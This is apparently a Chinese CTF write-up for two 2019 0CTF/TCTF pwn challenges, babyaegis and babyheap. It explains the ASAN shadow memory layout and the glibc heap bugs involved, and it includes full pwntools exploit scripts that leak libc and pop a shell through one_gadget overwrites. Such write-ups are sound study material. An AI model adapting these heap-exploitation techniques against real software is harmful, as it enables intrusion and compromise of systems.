2019 0CTF/TCTF Quals 部分PWN WriteUp

babyaegis

首先我们看一下程序开启的防护机制

程序开启了ASAN,UBSAN保护。

ASAN

asan(AddressSanitizer)是google开源的一个用于进行内存检测的工具，可以检测常见的heap and stack BufferOverflow，global buffer overflow, UAF等

asan主要由两个部分构成，插桩和动态运行库，其中插桩主要是针对的是llvm编译器级别对访问内存的操作（store，load和alloca等）,而动态运行库则主要提供一些比较复杂的操作，例如position/unposion（用于进行内存保护）和影子内存，同时hook free,malloc等函数。启用了asan保护的程序不同size大小的chunk是在不同内存区域进行分配的，并且free掉之后的内存在一段时间内并不会被启用。chunk也与一般的chunk不相同，其头部0x10字节大小的ChunkHeader用来存储chunk的一些信息。

struct ChunkHeader {
  // 1-st 8 bytes.
  u32 chunk_state       : 8;  // Must be first.
  u32 alloc_tid         : 24;
  u32 free_tid          : 24;
  u32 from_memalign     : 1;
  u32 alloc_type        : 2;
  u32 rz_log            : 3;
  u32 lsan_tag          : 2;
  // 2-nd 8 bytes
  // This field is used for small sizes. For large sizes it is equal to
  // SizeClassMap::kMaxSize and the actual size is stored in the
  // SecondaryAllocator's metadata.
  u32 user_requested_size : 29;
  // align < 8 -> 0
  // else      -> log2(min(align, 512)) - 2
  u32 user_requested_alignment_log : 3;
  u32 alloc_context_id;
};

影子内存：asan使用一个字节的数据记录主内存中八字节的数据，因为malloc是按照八字节进行对齐的。这样共分为9种情况
- 8字节的内容可写，则影子内存对应的1字节数据为0
- 8字节的内容不可写，则影子内存中对应的1字节数据为负数
- 8字节中前n字节可写，剩余地址不可写，则影子内存中对应的1字节数据为k

举例子来说，防御bufferOverflow，则对buffer所在的内存区域的前后两端加一块内存区域，称之为RedZone，并设置RedZone对应的影子内存区域为不可写即可。

asan中主内存与影子内存地址之间的对应采用的是直接内存映射的方式，即shadow_mem_address = (mem_address >> 3) + offset。对于64位来说其offset的值为0x7fff8000，对于32位来说其offset值为0X20000000.

我们看一下asan内存映射的表现

删除堆块之后影子内存变为

可以看到影子内存中0xfd表示对应的主内存中的空间为free状态。

申请的node的0x10大小的chunk地址为0x602000000020，其中buf对应的chunk为0x602000000000。影子内存对应的地址为

1	hex((0x602000000000 >> 3) + 0x7FFF8000) = 0xc047fff8000

从其中的数据我们可以看出0x602000000010，0x602000000030对应的十字节的地址是可以写的，其他内存区域都不可写。

并且从这里我们也可以看到0x20大小的chunk是从0x602000000000内存地址开始分配的。

利用

程序中的结构体如下

程序一共存在三个漏洞点，第一个是delete函数的时候并没有清空内存指针，造成可以UAF，第二个则是 read_until_nl_or_max函数如果输入的字节大小为size的话，则content字符串和id会连接在一起，在update函数的时候strlen就会超出预期的长度，造成堆溢出。但是这两个漏洞由于asan的原因都无法利用。还有一个类似于后门的函数，可以将任意的一个地址改写为0。

因此我们可以利用这个后门函数将下一个chunk对应的影子内存改写为0，这样就可以通过堆溢出修改下一个chunk的size位。

add(0x10, "1"*0x8, 0x123456789abcdef)
secret(0xc047fff8004)
update(0, "a"*0x12, 0x123456789) # overwrite chunkheader, off-by-one chunk size to 0
update(0, b'a' * 0x10 + p64(0x02ffffff00000002)[:7], 0x01f000000002ff)

首先申请一个0x10大小的chunk，首先申请的是buf位置，0x20大小的chunk，然后是node堆块，内存映射如上图相同。当我们输入的content的长度为size-0x8的时候， read_until_nl_or_max函数的返回值是size-0x8-0x1，后续输入的id会从此位置开始赋值，此时content,id两个域连接在了一起。如果我们输入的id的长度为0xf\0x10大小，就会与下一个chunk的ChunkHeader连接在一起。这里id的高1字节地址的位置为0xbe，此时如果update，程序调用的strlen长度会返回0x11大小，注意到此时会+1，如果我们提前利用secret函数将node堆块的内存映射更改为0的话，此时我们就可以覆写下一个chunk的ChunkerHeader。同理再次利用content,id字符串的连接，我们可以将堆溢出到ChunkerHeader的user_requested_size位置。

ChunkHeader的2-nd 8 Bytes的低29字节表示的是user_requested_size位置，也就是size从0x10大小被改为了0x10000000大小。当这个较大的chunk被释放掉之后，影子内存会被重新置为0xfa

此时如果再次申请一个node1，由于UAF的存在，我们可以通过buf控制node结构体。控制结构体就控制了buf指针，就可以利用0,1 node进行地址泄露和任意的地址写。

getshell的选择有两个一个是，覆写bbs的_ZN11__sanitizerL15UserDieCallbackE函数指针。如果在update的时候如果cfi函数的地址与cfi_check函数的地址不一样则会发生如下的函数调用链

如果我们将node1的buf改为_ZN11__sanitizerL15UserDieCallbackE函数的地址，注意到此时id的位置即为node0 cfi_address的位置，就可以利用node0对函数指针进行修改，将其修改为one_gadget地址，就可以getshell。

# encoding=utf-8
from pwn import *

file_path = "./aegis"
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 1
if debug:
    p = process([file_path])
    gdb.attach(p, "b *$rebase(0x114A25)")
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    one_gadget = 0x10a45c

else:
    p = remote('', 0)
    libc = ELF('')
    one_gadget = 0x0


def add(size, content="1\n", id=1):
    p.sendlineafter("Choice: ", "1")
    p.sendlineafter("Size: ", str(size))
    p.sendafter("Content: ", content)
    p.sendlineafter("ID: ", str(id))


def show(index):
    p.sendlineafter("Choice: ", "2")
    p.sendlineafter("Index: ", str(index))


def update(index, content, id):
    p.sendlineafter("Choice: ", "3")
    p.sendlineafter("Index: ", str(index))
    p.sendafter("New Content: ", content)
    p.sendlineafter("New ID: ", str(id))


def delete(index):
    p.sendlineafter("Choice: ", "4")
    p.sendlineafter("Index: ", str(index))


def shut():
    p.sendlineafter("Choice: ", "5")


def secret(address):
    p.sendlineafter("Choice: ", str(666))
    p.sendlineafter("Lucky Number: ", str(address))


add(0x10, "1" * 0x8, 0x123456789abcdef)
secret(0xc047fff8004)
update(0, "a" * 0x12, 0x123456789)  # overwrite chunkheader, off-by-one chunk size to 0
update(0, b'a' * 0x10 + p64(0x02ffffff00000002)[:7], 0x01f000000002ff)
delete(0)
add(0x10, p64(0x602000000018), 0)
show(0)
p.recvuntil("Content: ")
elf.address = u64(p.recv(6).ljust(8, b"\x00")) - 0x114AB0
log.success("elf address {}".format(hex(elf.address)))

puts_got = elf.got['puts']
update(1, p64(puts_got)[:2], puts_got >> 8) # strlen = 1
show(0)
p.recvuntil("Content: ")
libc.address = u64(p.recv(6).ljust(8, b"\x00")) - libc.sym['puts']
log.success("libc address {}".format(hex(libc.address)))

_ZN11__sanitizerL15UserDieCallbackE_address = elf.address + 0xFB0888
update(1, p64(_ZN11__sanitizerL15UserDieCallbackE_address)[:7], 0)
one_gadget += libc.address
update(0, p64(one_gadget)[:1], one_gadget)
p.interactive()

babyheap

是一个2.28下面的题目。程序提供了四种功能add,edit,delete,show。程序首先mmap了一段内存，然后申请了一块很大的内存空间之后才开始进行菜单操作。add函数中限制了申请的最大的堆块的大小为0X58，并且采用calloc分配，不经过tcache。buf_list存储在之前mmap的空间内。

漏洞出现在update函数中，存在一个off-by-null漏洞。

利用

泄露libc基址的需要一个unsorted bin，但是限制的最大的chunk为fastbin，fastbin转换为unsortedbin可以通过malloc_consolidate函数将fastbin放入small bin中，此时就存在一个main_arena附近的地址。

可以通过利用的堆的高一字节地址0x56将chunk分配到main_arena的位置，覆写top chunk到free_hook的位置，将free_hook覆写为one_gadget

想要调用malloc_consolidate函数需要的就是top chunk的大小不满足用户申请的大小，在程序一开始申请了一个较大的chunk之后，top chunk的大小是0x1da0。需要注意的是在消耗top chunk的时候需要提前申请连续的fastbin堆块，以方便后面的fastbin合并。
在堆块合并得到unsorted bin之后，利用off-by-one覆写其size区域，使unsorted bin shrink到之前布局好的pre_size,size位置，之后再利用consolidate合并堆块。连续申请几个堆块就可以得到指向相同堆块的两个指针。
利用fastbin attack分配chunk到main_arena位置，利用chunk的0x56高一字节地址作为size，覆写top chunk指向heap起始位置。heap起始存储的是tcache_perthread_struct结构体，也就是tcache_entry结构体中key指向的位置。通过覆写此结构体可以更改tcache中存储的堆块的数量。
1
2
3
4
5
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
连续分配几个chunk得到指向heap起始位置，覆写所有的counts为零。覆写top chunk指向stdin的位置。然后连续分配chunk消耗top chunk，最终将堆块分配到free_hook的位置。在不断申请chunk的过程中，在tcache满的时候需要清空一下tcache的count，防止释放堆块的时候进入fastbin，影响后面的堆块申请。

# encoding=utf-8
from pwn import *

file_path = "./babyheap"
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 1
if debug:
    p = process([file_path])
    # gdb.attach(p, "b *$rebase(0x18a7)")
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    one_gadget = 0x103f50

else:
    p = remote('', 0)
    libc = ELF('')
    one_gadget = 0x0


def add(size):
    p.sendlineafter("Command: ", "1")
    p.sendlineafter("Size: ", str(size))


def edit(index, size, content):
    p.sendlineafter("Command: ", "2")
    p.sendlineafter("Index: ", str(index))
    p.sendlineafter("Size: ", str(size))
    p.sendafter("Content: ", content)


def delete(index):
    p.sendlineafter("Command: ", "3")
    p.sendlineafter("Index: ", str(index))


def show(index):
    p.sendlineafter("Command: ", "4")
    p.sendlineafter("Index: ", str(index))


def padding(size):
    for i in range(7):
        add(size)
        edit(i, size, "a" * size)

    for i in range(7):
        delete(i)


def padding2(size, index_array):
    for i in range(6):
        add(size)
    for i in index_array:
        delete(i)
    edit(12, 0x28, b"\x00" * 0x28)


# 0x555555578260 (size : 0x1da0)
padding(0x28)  # cost 0x700
padding(0x38)  # remain 0x1000

for i in range(8):
    add(0x48)
    edit(i, 0x48, "a" * 0x48)
for i in range(7):
    delete(i)

# remain 0x800
for i in range(4):  # fastbin
    add(0x38)
    edit(i, 0x38, "a" * 0x38)
add(0x38)
# make fake chunk
edit(4, 0x38, p64(0) * 4 + p64(0x100) + p64(0x60) + p64(0))
# remain 0x300
add(0x48)
edit(5, 0x48, "a" * 0x48)
add(0x38)
edit(6, 0x38, "a" * 0x38)
# reamin 0x100

for i in range(5):
    delete(i)

add(0x58)
add(0x58)
# reamin 0x40
# malloc_consolidate, get 0x40*5 - 0x30 = 0x110 unsorted bin
add(0x28)
# off-by-one, 0x110->0x100
edit(2, 0x28, "a" * 0x28)
delete(5)
add(0x38)  # 3
add(0x38)
add(0x38)  # 5
add(0x38)  # 8
delete(3)
delete(4)
# malloc_consolidate fastbin,get 0x50+0x110-0x30=0x130 unsorted bin
add(0x28)  # 3
add(0x48)  # 4
show(5)
p.recvuntil("Chunk[5]: ")
libc.address = u64(p.recv(8)) - 96 - 0x10 - libc.sym['__malloc_hook']
log.success("libc address {}".format(hex(libc.address)))

top_chunk_address = libc.sym['__malloc_hook'] + 0x10 + 96

add(0x48)  # 9 = 5, overlap 8
delete(4)
delete(9)
delete(2)
show(5)
p.recvuntil("Chunk[5]: ")
heap_address = u64(p.recv(8))
log.success("heap address {}".format(hex(heap_address)))

edit(5, 0x8, p64(top_chunk_address - 0x4b))
add(0x48)  # 2 = 5, overlap 8
add(0x48)  # 4 main_arena chunk

tcache_entry_address = heap_address - 0x1f850
edit(4, 0x43, b"\x00" * 0x3 + p64(0) * 7 + p64(tcache_entry_address))

add(0x58)  # 9
add(0x28)  # 10
add(0x28)
add(0x28)  # 12 tcache_entry
edit(12, 0x28, "\x00" * 0x28)  # overwrite tcache_entry
delete(10)
delete(11)
delete(9)

# 0x7ffff7fc18e8 <__free_hook>, 0x7ffff7fc0850 <stdin>
edit(4, 0x43, b"\x00" * 0x3 + p64(0) * 7 + p64(libc.sym['stdin']))

index_array = [9, 10, 11, 13, 14, 15]
for i in range(7):
    padding2(0x58, index_array)

# gdb.attach(p, "b *$rebase(0x18a7)")

add(0x58) # 9
add(0x58)
add(0x58) # 11

edit(11, 0x10, p64(0) + p64(libc.address + one_gadget))

delete(9)

p.interactive()